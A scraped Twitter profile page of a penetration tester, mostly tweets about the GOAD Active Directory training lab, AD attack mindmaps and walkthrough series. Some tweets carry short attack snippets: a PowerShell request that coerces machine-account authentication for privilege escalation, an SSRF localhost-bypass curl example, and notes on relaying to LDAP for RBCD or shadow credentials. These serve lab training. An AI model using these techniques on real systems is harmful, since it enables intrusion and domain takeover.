Mayfly
@M4yFly
Followers
5,693
Following
768
Media
53
Statuses
467
Former Dev and DevOps| Pentester and red teamer at orange cyberdefense | OSCE³| Tweet are my own| discord: m4yfly
Joined November 2017
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Merchan
• 133345 Tweets
Jean Carroll
• 114849 Tweets
Chester
• 114274 Tweets
Milli
• 98302 Tweets
Dick Cheney
• 83526 Tweets
Eagles
• 80293 Tweets
#CristinaMostraElTitulo
• 73967 Tweets
Mbappé
• 58495 Tweets
Franco Escamilla
• 53677 Tweets
Barcola
• 44041 Tweets
Packers
• 37137 Tweets
Barış Alper
• 34687 Tweets
Fraternal Order of Police
• 34244 Tweets
#FRAITA
• 28077 Tweets
Galler - Türkiye
• 24375 Tweets
SixTONES冠番組
• 18334 Tweets
Sergio Mendes
• 18112 Tweets
Go Birds
• 16946 Tweets
#الجوهره_للاهلي_ممثل_الوطن
• 16843 Tweets
VIERNES DE FURIA
• 16293 Tweets
Montella
• 15728 Tweets
Tonali
• 15501 Tweets
Deschamps
• 15312 Tweets
ايطاليا
• 14424 Tweets
Dimarco
• 12680 Tweets
Iker
• 11733 Tweets
Arda Güler
• 11047 Tweets
Saliba
• 10703 Tweets
Dembele
• 10040 Tweets
Pinned Tweet
GOAD v2 is out !
You can now test your AD commands and pentest skill on a multi-domain AD lab.
Have fun :)
47
453
1K
AD Pentest mindmap upgrade :
Full version:
xmind version (slow, the map is big) :
Fell free to tell me what is missing !
28
742
2K
Welcome to the new AD Mindmap upgrade !
v2022_11 will be dark only (this is too painful to maintain two versions).
Thx again to :
@Vikingfr
and
@Sant0rryu
for their help 👍
Full quality and zoomable version here :
Overview :
40
452
1K
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr
http://192.168.56.1
-UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
8
163
617
A new Lab 🏰 is available on GOAD: NHA.
This time it is a challenge, 5 vms, you start with no account and try to get domain admin on the two domains.
Have fun !
9
163
477
Complete guide to deploy GOAD on Proxmox is ready 🥳
- part 1: Proxmox + pfsense
- part 2: template with packer
- part 3: providing with terraform
- part 4: provisioning with ansible
- part 5: add openvpn access
=>
10
160
467
GOAD update available 🥳
- Azure provider is now supported thx to
@Zeph_RooT
!
- Two versions of the lab are available (A light version with 3 computers has been added).
- Some scripts to help install.
- Refactoring to simplify adding lab and providers.
14
153
466
Mindmap upgrade version 2023_02 thx to
@Jenaye_fr
and
@DaahtK
for the help.
Full quality here :
13
158
451
Goad small update ! 🏰 🥳
i added scenarios to complete some compromise path.
- files with secrets in shares
- gmsa account
- asrep account on essos
- write dacl on container
- unconstrained delegation on user
- protected user
- sensitive user
- ppl
8
110
434
If you want to play with an Active Directory lab.
Here is the "Game Of Active Directory" project.
Still a lot of stuff to add but already fun to play with ;)
0
156
415
New lab 🏰 for the GOAD project 🥳: SCCM
You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware.
More information here:
Repository here :
Thx again
@KenjiEndo15
for your help to building this !
8
146
356
Goad writeup part 11 is up. This one is about acl/ace exploitation.
8
100
321
The answer is not simple ^^ a small thread 🧵
@M4yFly
Hello!
your research is great🍻
The path in the figure, how to obtain the domain admin?
1
1
9
4
76
303
Finally, the last part of GOAD writeups is done ! 🥳
Part 12 : Trusts
13
105
288
SCCM lab write up 📝 started:
- Part 0x1 : Basic Recon & PXE exploit
- Part 0x2 : Low user exploitation
1
90
270
AD mindmap update (now in svg 🥳 ):
- white background:
- black background:
Thanks to
@Vikingfr
and
@Sant0rryu
for the help !
As always xmind sources are available here :
1
117
260
SCCM Lab write up 📝part 0x3 is out:
- Exploit as client admin
- Exploit as sccm admin
Find all the articles about the SCCM laboratory exploitation here :
1
71
183
Yeah ! 🥳🥳🥳
Thx a lot
@offsectraining
for all these courses, challenges and certifications !
15
6
178
Major GOAD refactor and update today 🥳
Add RDP bot user
Add Webdav support
Ansible inventory was refactored, you can now find it on the lab folder (ad/sevenkingdoms.local/inventory).
And now you can easily build your own lab from the template :
3
21
104
Goad pwning part13, let's have fun with file coerce (lnk,url), webclient, impersonate and the old one rdphijack.
1
44
103
Play with the ad lab goadv2 - part 10 : delegations
- constrained
- unconstrained (with and without protocol transition)
- resource based
4
32
96
As you ask, sources of the mindmap can be found here :
The commands are also available on the arsenal cheatsheet tool :
The mindmap wil be versionned here :
And btw, i love pull request ;)
0
36
78
GOAD exploitation part5 : sAMAccountName spoofing and printNightmare.
0
28
75
Thx to
@snovvcrash
for his awesome pull request !
An exchange server pentest mindmap.
All credits belong to him. It's a very nice work 👍
full version here :
0
21
69
GOAD pwning part4 - poison and relay
1
24
54
Let's have some fun with MSSQL in GOAD this time 😁
3
9
52
Today, some lateral move inside GOAD.
0
16
42
I was tired to find websites version on black box pentest (you know when all the classic files don't leak the version and you have trouble to identify it)
If you are in the same case you could give a try to this tool (compare statics files with a git repo)
1
10
39
than relay to Ldap and :
- start_tls + add a computer to the domain + RBCD
or
- shadow credentials
Example with RBCD :
1
3
34
@Djax_Alpha
@TCMSecurity
If you want them to learn AD i recommend those read :
-
-
-
-
-
-
-
-
1
7
24
And you can now do a shadow credentials on the dc and own the domain :)
1
0
23
And then enjoy your shell as administrator 🥳 (or directly use psexec to get system)
0
2
21
@_Nidouille_
@xhark
J'aime bien voir mon boulot circuler sur internet. Je fais ça pour le partage avant tout donc ça fait plaisir, peut importe le crédit. Par contre faudrait prendre la version à jour svp 😉 (et encore elle mériterait un bon upgrade)
3
2
19
@snovvcrash
You can use the -of option, no need for an additionnal smb server 😉
Exemple here :
3
1
17
My last root-me challenge is finally publicly available \o/
Give it a try ;)
0
5
17
Modify to change the flag 0x0 to 0x3.
(reference on flags here : )
Thx to zamnry for the info found here :
1
1
13
@MJHallenbeck
i think i got something for you ;)
New lab 🏰 for the GOAD project 🥳: SCCM
You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware.
More information here:
Repository here :
Thx again
@KenjiEndo15
for your help to building this !
8
146
356
1
1
12
@lkarlslund
For those who take it seriously, small reminder. Goad is a training lab, not a chall. If you want a chall try NHA 😉
1
0
9
@_nwodtuhs
@antoineQu
@byt3bl33d3r
Thx buddy 😉
With
@Vikingfr
we setup a website to show the mindmap in svg, without quality loss.
(If you look the svg on icons are not loaded due to csp)
0
3
10
upgrade content :
- certpatatoes ()
- ldeep ()
- impacket trust commands ()
- irs ()
1
0
8
Now you can change groups that have inheritance enable. (You are not allowed to change Domain Admins or other sensitive groups or users with inheritance disable). But Key Admins seem to be a good target.
2
1
9
@_nwodtuhs
@FrenchKey_fr
i recommend you the Lockpickinglawyer videos :
(if you don't already know this channel, i am not responsible for the hours you will spend on it ;) )
1
0
8
- Steal rdp session
- impersonate cme module
- Some azure adconnect stuff
- cme module drop-sc
- cme module slinky
- and other stuffs ...
2
0
7
So you have genericAll on the Users container.
The first thing to do is check the inheritance.
1
0
7
@n00py1
The official mitigation page say ()
"Additional mitigation : Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic."
Try by relaying a server maybe ?
1
0
5
@sagaryadav8742
Receiving Java version doesn't proof if the target is vulnerable or not! it only show you if you can use remote class loading.
Please read this :
1
0
6
@ccrraamm
@0xConda
Yes I deleted the xmind link as it is not up to date, and I see it everywhere without credits...
The last updated version can be found here :
I still have to add some new technics like krbrelayup. So a new version will come soon 👍
AD mindmap update (now in svg 🥳 ):
- white background:
- black background:
Thanks to
@Vikingfr
and
@Sant0rryu
for the help !
As always xmind sources are available here :
1
117
260
1
0
6
@makcimalex
Sure i will continue the development. And i also really want an automatic build for wsus and exchange ^^
This will come,...one day when i will get the time to do it ;)
0
0
5
@Djax_Alpha
@TCMSecurity
If you want to train them for free or few $
- (computer to practice the fr course)
- (some realist challenges)
-
- (labs and some machines with AD)
- ;)
0
0
4
@the_ibra_him
@binaryz0ne
Thanks. What explanation do you need ?
I wrote a guide to exploit it here if that you need :
2
1
4
@akinog1
@AliBawazeEer
Maybe with some terraform-fu, it could be deployed on azure easily.
@chvancooten
have done a really nice work on azure deployment on his lab :
This will be a nice source of inspiration 👍
But for this i will have to rollback some kb to setup some vulns 😅
1
1
4
@Sh0ckFR
@DarkCoderSc
@fr0gger_
@Jean_Maes_1994
@0xBoku
@HackingDave
@am0nsec
@sadreck
@x86matthew
@C5pider
@peterwintrsmith
@mariuszbit
@httpyxel
@hackerfantastic
It asking me for my password and I am on my Phone so I can't verify anything 😅
I am scared 😬
1
0
4
@the_ibra_him
@binaryz0ne
Also if you need more details on each attack I recommend
@_nwodtuhs
website :
1
1
3
@philosophene
Bing ai image generator give the N with II. I thought it was nice so I left it as is. 😁
1
0
2
@Maki_chaz
@_SIben_
@swuitch
Excellent article, juste quelques remarques sur la partie red :
pour la wordlist : cewl fait bien le taf ()
pour la ssrf avec mysql j'ai vu ce tool aussi :
0
0
3
@Maki_chaz
@_SIben_
@swuitch
A noter aussi que la restriction de la SSRF sur localhost se bypass bien. ça tombe dans les cas décrits par orangetsai avec à la fois du parse_url et du curl:
curl
http://url/test.php
-d 'url=
http://[email protected]:80
@localhost
/'
0
0
3
@EvilOrez
Thx!
About the responder redirect to pth, you can't do that with netntlm hash and you have to crack it or relay it. May be you confuse the type of hash and response (I know thoses names...) . Give a look at this chart made by
@_nwodtuhs
😉
Mindmap 🧠 for pass-the-whatever and common attacks operated on Active Directory authentication protocols (NTLM, Kerberos)
➡️ Featured on
16
361
980
0
0
2
@RandoriSec
@_Barney0
Ah ben ça va, vous vous mettez bien chez randori ! Congrats
@_Barney0
🥳, le bonjour à
@Phenol__
quand tu le croiseras 😉
0
0
3
A simple template to create a virtualbox vm LAMP with Vagrant and Ansible.
(usefull to create a challenge or to test an exploit).
0
0
3
When you are looking for
#log4shell
trace of exploitation.
On java11 with an exploit by reference on Tomcat.
- You are looking for an output TCP connection to the rogue JNDI.
- And in the java logs created by log4j the only thing you will get is "javax.el.ElProcessor@..."
0
1
3
@rayanlecat
@assume_breach
Nice but some things are missing. Like python venv, ansible install, some libs like rsync and ansible-galaxy requirements.
Also do not run goad script as root it will create vm for root user in virtualbox instead of your user. 😉
1
0
1
2
1
2